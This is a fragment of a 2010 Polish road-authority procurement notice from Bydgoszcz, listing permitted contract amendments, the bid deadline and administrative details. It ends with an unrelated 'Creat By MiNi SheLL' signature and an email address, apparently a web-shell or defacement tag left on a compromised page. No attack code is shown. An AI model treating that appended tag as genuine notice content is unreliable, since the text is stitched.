<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy (w formie aneksu), w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 

1. Zmiana terminu realizacji zamówienia w przypadku: 
a) przerw w realizacji opracowania dokumentacji projektowej powstałych z przyczyn nie leżących po stronie Wykonawcy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy; 
b) wystąpienia niezgodność pomiędzy częścią opisową a kartograficzną ewidencji gruntów,
c) przedłużeniu uległy procedury administracyjne na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych z przyczyn nie wynikających z winy Wykonawcy,
d) nastąpił sprzeciw właścicieli terenu na prowadzenie prac przygotowawczych (pomiary geodezyjne, odkrywki geologiczne itp.) niezbędnych do prac projektowych.
e) zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy np. wyjątkowo niesprzyjających warunków atmosferycznych odbiegających od typowych;
f) zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,

2. Zmiana podwykonawcy,  których nie można było przewidzieć w chwili sporządzenia niniejszej oferty i w chwili zawarcia umowy, pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;

3. Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy.
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy, a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.


Wszystkie powyższe postanowienia stanowią zamknięty katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdw-bydgoszcz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Bydgoszczy 
85-085 Bydgoszcz 
ul. Fordońska 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 09:45, miejsce: Zarząd Dróg Wojewódzkich w Bydgoszczy 
85-085 Bydgoszcz 
ul. Fordońska 6
pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com